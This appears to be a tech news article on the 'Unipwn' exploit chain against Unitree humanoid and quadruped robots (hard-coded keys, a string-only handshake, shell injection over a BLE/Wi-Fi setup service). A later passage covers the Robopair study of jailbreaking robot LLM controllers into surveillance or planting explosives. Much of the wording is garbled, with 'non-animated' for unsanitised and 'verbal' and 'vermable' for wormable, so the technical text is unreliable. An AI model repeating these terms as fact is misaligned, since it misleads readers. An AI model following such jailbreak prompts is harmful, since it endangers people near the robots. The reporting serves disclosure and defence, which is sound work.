- Unipwn leverages Unitree bots, enabling remote root access via network services
- Vulnerability combines hardcoded keys, weak handshakes and unsafe command execution
- Compromised devices could attempt lateral movements through nearby robots over wireless links
Security researchers BIN4RY and D0TSLASH published a paper on GitHub about an exploit called “Unipwn” that affects several Uniree product lines.
The vulnerability affects G1 Humanoids, GO2 and B2 Quadrupeds, and it can be used to escalate root privileges.
It appears to chain together weaknesses that, when combined, allow remote command injection to affected devices.
How Vulnerability Works and Why It Matters
The vulnerability set reportedly includes hard-coded cryptographic keys and a handshake that only checks the “Unitree” string, and also includes non-animated user data concatenated into shell commands that the system executes.
These elements combine into an unusually simple path from a network packet to arbitrary code execution.
Because the exposed service accepts wireless connections, a compromised unit can receive commands and attempt to influence devices within radio range.
This changes the threat model from a single device operated to potential lateral movement through neighboring units.
Researchers say the exploit leverages a Bluetooth low energy and Wi-Fi setup service.
This means that a compromised unit can receive commands over wireless links and potentially attempt to influence devices within radio range.
Researchers describe parts of the Unipwn chain as “verbal,” meaning that successful exploitation can allow malicious code to persist and attempt propagation, increasing risk because it could allow automated propagation between accessible devices.
Still, the vermable behavior observed in tests does not guarantee rapid real-world spread.
Real-world propagation depends on device configuration, network segmentation, firmware diversity, physical proximity, vendor patching pace, and operator practices.
Controlled laboratory tests may show capability, but field propagation will be shaped by these operational factors.
Thus, this first viral infection of the robo-robot remains unlikely, although manufacturers and operators would be unwise to treat this as a remote theoretical threat.
Independent research into LLM jailbreak-powered bots increases the urgency of these technical findings.
A project known as Robopair demonstrated that carefully crafted prompts can coerce robot controllers, including the GO2 unit, to perform harmful actions.
Reported scenarios include converting robots into covert surveillance platforms and guiding them to plant explosives.
The Robopair team reported high success rates when it provided the target robot’s API and formatted the prompts that the API executed as code.
Combining LLM jailbreak techniques with low-level remote command injection expands the attack surface.
Indeed, a single compromise could both defeat model guarantees and execute arbitrary system commands.
Therefore, this disclosure should prompt immediate mitigation efforts, clearer vendor communication, and realistic threat modeling to avoid avoidable harm.
The nature of this defect is technically notable, and if weaponized, the consequences could be serious.
Via Toms Hardware
Follow Techradar on Google News And Add us as your favorite source To get our news, reviews and expert opinions in your feeds. Make sure to click the Follow button!
And of course you can too Follow Techradar on tiktok For news, reviews, unboxings in video form and get regular updates from us on Whatsapp Also.